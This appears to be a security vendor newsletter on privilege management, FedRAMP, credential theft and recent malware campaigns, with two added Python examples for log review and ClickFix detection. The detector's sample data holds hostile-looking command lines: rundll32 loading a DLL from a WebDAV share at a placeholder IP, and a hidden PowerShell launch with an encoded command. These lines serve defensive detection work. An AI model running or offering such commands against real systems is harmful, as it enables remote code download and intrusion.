"We’re in a fortunate—or unfortunate—position in that we get to hear the stories of lots of customers who have come to us after they got hit. We get to see details of those attacks, and in many cases, we get to understand them. We’re taking all of that data, and we build around it." - Danny Jenkins
Danny Jenkins joins Adam Savage's Tested
Why Adam Savage won't trust USB keys
This week, Danny joined Adam Savage's Tested to discuss the dangers of USB keys. You never know what could be on those drives, and you could initiate a malicious program just by plugging it in.
And how endpoint privilege management shuts them down
What's happening: Many organizations still rely on broad admin privileges to keep operations moving, but that convenience comes at a cost. Endpoint privilege management (EPM) controls and monitors user privileges to reduce security risk while ensuring users always have access to what they need. Instead of blanket admin access, EPM offers granular, just-in-time privileges and clear logging for analysis and record keeping.
Why it matters: Overprivileged accounts are one of the easiest ways for attackers to escalate access and move laterally. A minor compromise can quickly become a major breach. EPM also helps satisfy many industry regulatory requirements without expanding your attack surface.
The big picture: Least privilege is no longer optional. A strong EPM solution should include automation capabilities to lighten the load on IT teams, scalability, and clear visibility into access and policy decisions. ➡️Read more about how to choose the right EPM solution.
What you need to know: Security expectations are increasing for all organizations, particularly federal agencies, their contractors, MSPs, and technology providers. FedRAMP status indicates long-term viability for organizations operating in regulated environments. Organizations on the FedRAMP Marketplace have passed one of the most demanding audit and validation programs in the world, meaning the platform is built to meet sustained, enforceable security expectations.
Why it matters: Organizations aren't just being asked if they're compliant. They're being asked if they can enforce security continuously, produce audit-ready evidence at any time, and if they can scale into regulated environments. FedRAMP helps answer those questions early.
The big picture: FedRAMP is about more than compliance. FedRAMP security is stronger by design, helps you align quickly with common security frameworks like CMMC and NIST, and prevents future rework when it comes to audits and regulatory exposure. ➡️Learn more about FedRAMP.
What's happening: Cybercriminals are doubling down on credential theft because it works. According to Verizon's 2025 DBIR, 22% of breaches assessed used compromised credentials as the initial access vector. Attackers are using phishing, social engineering, infostealers, and purchased credentials to gain access without triggering alarms.
Why it matters: When attackers log in with valid credentials, lateral movement, data exfiltration, and privilege escalation are all easier. AI is making phishing and social engineering more believable, meaning organizations must assume credentials will be compromised and plan to stop attackers if they get inside.
The big picture: Even simple security controls go a long way in protecting your organization. Organizations should continuously review access logs to better identify unusual activity like logins from unusual locations, spikes in failed login attempts, and unexpected after-hours access. ➡️Get more tips for protecting your organization from credential theft.
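The three log-review signals named above (logins from unusual locations, spikes in failed logins, and after-hours access) can be checked with a few lines of code. The following is an added example written for this page, not code from the newsletter or any vendor product; the log format, the sample lines, the one-minute failure window and the 08:00 to 18:00 business hours are all constructed assumptions.

```python
"""Review constructed authentication log lines for three signals: logins from
an unusual country, bursts of failed logins, and successful logins outside
business hours.  Example written for this page; the log format, sample data
and thresholds are assumptions, not any product's format."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not real data): timestamp user country result
SAMPLE_LOG = """\
2025-03-03T09:12:04Z alice US success
2025-03-03T09:15:30Z alice US success
2025-03-03T22:47:11Z alice RO success
2025-03-03T10:01:00Z bob US failure
2025-03-03T10:01:05Z bob US failure
2025-03-03T10:01:09Z bob US failure
2025-03-03T10:01:14Z bob US failure
2025-03-03T10:01:20Z bob US failure
2025-03-03T10:01:31Z bob US success
2025-03-04T02:30:00Z carol US success
2025-03-04T14:00:00Z carol US success
"""


def parse_log(text):
    """Turn the whitespace-separated sample format into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, country, result = line.split()
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "user": user,
            "country": country,
            "result": result,
        })
    return events


def unusual_locations(events, known):
    """Successful logins from a country not in the user's known set.

    `known` maps user -> set of countries seen in a baseline period
    (constructed here; in practice built from prior logs)."""
    return [(e["user"], e["country"]) for e in events
            if e["result"] == "success"
            and e["country"] not in known.get(e["user"], set())]


def failed_login_spikes(events, threshold=5, window=timedelta(minutes=1)):
    """Users with at least `threshold` failures inside any sliding `window`."""
    by_user = defaultdict(list)
    for e in events:
        if e["result"] == "failure":
            by_user[e["user"]].append(e["ts"])
    flagged = []
    for user, times in by_user.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Slide the window start forward until it fits inside `window`.
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.append(user)
                break
    return flagged


def after_hours_logins(events, start_hour=8, end_hour=18):
    """Successful logins outside [start_hour, end_hour); sample times are UTC."""
    return [(e["user"], e["ts"].isoformat()) for e in events
            if e["result"] == "success"
            and not (start_hour <= e["ts"].hour < end_hour)]


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    baseline = {"alice": {"US"}, "bob": {"US"}, "carol": {"US"}}
    print("unusual locations:", unusual_locations(evs, baseline))
    print("failed-login spikes:", failed_login_spikes(evs))
    print("after-hours logins:", after_hours_logins(evs))
```

On the constructed sample, alice's login from RO is flagged both as an unusual location and as after-hours, bob's five failures within twenty seconds trip the spike check, and carol's 02:30 login is flagged as after-hours. The baseline of known countries is the part that matters operationally: it has to be built from a trusted period of prior logs, or the check will flag every traveller.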
Join us to learn how AI-boosted attacks work, what they're targeting, and how you can fight back to protect your organization.
Attackers are following their targets across platforms
What's happening: Microsoft is warning of new campaigns that use WhatsApp to deliver malware directly to targets. Since February, attackers have been using the app to distribute Visual Basic Script files that start a multi-stage infection chain leading to remote access. After gaining access, attackers escalate privileges and ultimately install malicious MSI packages.
Why it matters: WhatsApp is widely used and trusted, making it a prime vector for attackers. The activity blends into normal system activity and uses legitimate tools and platforms to lower skepticism.
The big picture: In a Zero Trust architecture, you never let your guard down. Phishing attacks are increasing and becoming more believable, but don't let that distract you from other potential access vectors. Attackers will follow users across platforms. Defense should as well.
ClickFix evolves to bypass PowerShell detection
Blending malicious commands into legitimate behavior
What's happening: CyberProof researchers identified a new variant of ClickFix attacks that tricks victims into infecting their own devices. By combining the Windows Run dialog, rundll32.exe, and WebDAV, attackers bypass defenses that monitor for script-based activity. The chain begins by luring users to a compromised site, where they are prompted to open Windows Run and paste a copied command. Eventually, the infection chain transitions to PowerShell, using non-interactive flags to download and run additional payloads without raising alarm.
Why it matters: Many defenses are designed to catch suspicious command execution. This campaign deliberately avoids recognizable function names to evade that detection. To further hide from sandbox environments and analysts, it resolves Windows APIs on the fly by matching DJB2 hashes of their names instead of referencing the names directly.
The big picture: Detecting unusual behavior is key to preventing new variants such as this one. Restricting unnecessary WebDAV traffic and monitoring for unusual executions can stop an attack like this early.
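The two "unusual executions" the article describes, rundll32.exe launched with a WebDAV UNC path and a follow-on PowerShell launch with non-interactive flags, can be surfaced from process-creation telemetry. The following is an added example written for this page; it is not CyberProof's detection content or any vendor's rule. The pipe-separated event format, the sample events (with a documentation-range IP), the parent/child relationship checked, and the flag list are constructed assumptions.

```python
"""Flag constructed process-creation events matching the ClickFix pattern
described in the article: rundll32.exe given a WebDAV UNC path, and a
PowerShell process started non-interactively (here, as a child of rundll32).
Example written for this page; the event format, sample data and flag list
are assumptions, not real telemetry or a vendor rule."""
import re

# Constructed sample events (not real telemetry): parent|image|command line.
# 203.0.113.5 is a documentation-range address used as a placeholder.
SAMPLE_EVENTS = r"""
explorer.exe|rundll32.exe|rundll32.exe \\203.0.113.5@80\DavWWWRoot\x.dll,Start
explorer.exe|rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL
rundll32.exe|powershell.exe|powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand <base64-placeholder>
svchost.exe|powershell.exe|powershell.exe -File C:\Scripts\inventory.ps1
"""

# WebDAV UNC form used by the Windows WebClient: \\host[@port|@SSL][@port]\DavWWWRoot\...
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+(@\d+|@SSL)?(@\d+)?\\DavWWWRoot\\", re.IGNORECASE)

# Common PowerShell switches (and their short aliases) that suppress a visible,
# interactive session: -NonInteractive/-NonI, -NoProfile/-NoP,
# -WindowStyle Hidden/-w hidden, -EncodedCommand/-Enc.
NONINTERACTIVE = re.compile(
    r"-(noni\w*|nop\w*|enc\w*|w(indowstyle)?\s+hidden)", re.IGNORECASE)


def parse_events(text):
    """Split the pipe-separated sample format into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parent, image, cmd = line.split("|", 2)
        events.append({"parent": parent.lower(), "image": image.lower(), "cmd": cmd})
    return events


def flag_event(e):
    """Return the list of reasons this single event looks suspicious."""
    reasons = []
    if e["image"] == "rundll32.exe" and WEBDAV_UNC.search(e["cmd"]):
        # rundll32 loading a DLL from a WebDAV share rather than a local path
        reasons.append("rundll32_webdav")
    if e["image"] == "powershell.exe":
        if NONINTERACTIVE.search(e["cmd"]):
            reasons.append("powershell_noninteractive")
        if e["parent"] == "rundll32.exe":
            # A script host is an unusual parent for PowerShell in this chain
            reasons.append("powershell_parent_rundll32")
    return reasons


def detect(events):
    """Return [(event_index, reasons)] for every event with at least one reason."""
    hits = []
    for i, e in enumerate(events):
        reasons = flag_event(e)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, why in detect(parse_events(SAMPLE_EVENTS)):
        print(idx, why)
```

On the constructed sample, the first event is flagged for the WebDAV path, the benign Control Panel launch on the second line is not, the third is flagged on both the non-interactive switches and its rundll32 parent, and the scheduled inventory script on the fourth line passes. Correlating the first and third hits by process ancestry is what turns two weak signals into the "stop it early" outcome the article recommends, alongside restricting WebDAV (WebClient) traffic that the environment does not need.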
The next issue of Cyber Hero Frontline features insights into: